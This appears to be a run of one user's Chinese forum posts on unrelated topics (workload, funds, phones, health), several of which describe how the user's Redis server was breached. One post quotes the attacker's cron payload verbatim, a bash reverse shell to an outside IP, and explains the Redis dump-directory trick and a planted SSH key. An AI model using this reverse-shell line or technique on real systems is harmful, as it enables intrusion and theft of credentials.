是上了什么 cdn 么？感觉好快

之前比较忙的时候，三四个需求。

上午一个需求

下午另外一个需求

晚上在搞一个

慢慢的，就差不多了，其实还好说实话

@nashxk 这片子我真没看懂，去年直接在电影院睡着了

滴滴

主要是强制吧，和自己 xx == null 来进行判断。
直接抛异常，他不香么

选几个比较好的基金，然后无脑定投即可。

@zyfsuzy 年终基本 2-3 个月，看绩效。公积金 12%，额外医保，饭补啥的。

安卓小米 11
ios 苹果 mini

iphone 你怕啥，直接后台给关掉就好了，权限不给就没问题了

有具体岗位么？后台招么

@CodeCodeStudy linux 上定时任务，crontab 每分每秒都执行

和你一样。

这是慢性荨麻疹，去过很多北京的三甲医院都没办法，只能提高自己的免疫力。

顺便吐槽下北京的暖气开得太热了，30°都有了。

@iloveayu 我也查到他的 qq，姓名了，准备 qq 联系一下。还没有手机号，不知道咋搞

@WordTian @yuelang85 确定了，是通过 redis set key，然后 conf 修改了 dump 的文件目录，大意了，唉

@k8ser @ztxcccc 感觉报警有点麻烦，晚上研究下他的网址。看看能不能联系上，聊一下。

@beichenhpy 是的，root 用户。已经肯定了是从 redis 入侵的，修改了 dump 文件目录

感谢各位大佬的帮助以及建议，昨晚排查到快一点，今天早上又看了看，基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网，具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据，set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ，日志如下：


然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志，大概在 12.9 日已经入侵了，但不知道入侵者的目的。


至今位置，cpu, 内存都一切正常，数据也没有丢失。但是应该数据库，redis，zk 等密码他全部获取到了。

写到了环境变量里面去了，唉。

晚上准备收集一下他的资料，准备和他谈谈，再次感谢各位大佬的帮助了。

可以参考如下两篇文章，写的很详细：

redis 入侵： https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell： https://www.cnblogs.com/bonelee/p/11021996.html

@WordTian redis 是有对外开放的端口。但是端口不是常用的，并且有设置密码。是有项目在用 redis 塞数据，但 redis 是怎么做到 往 cront 里面写数据的？ RDB 文件？

@zszhere .ssh 真有一条公钥，吓死我了，不知道什么时候写进去的，感谢老哥提醒。我还得在排查下其他的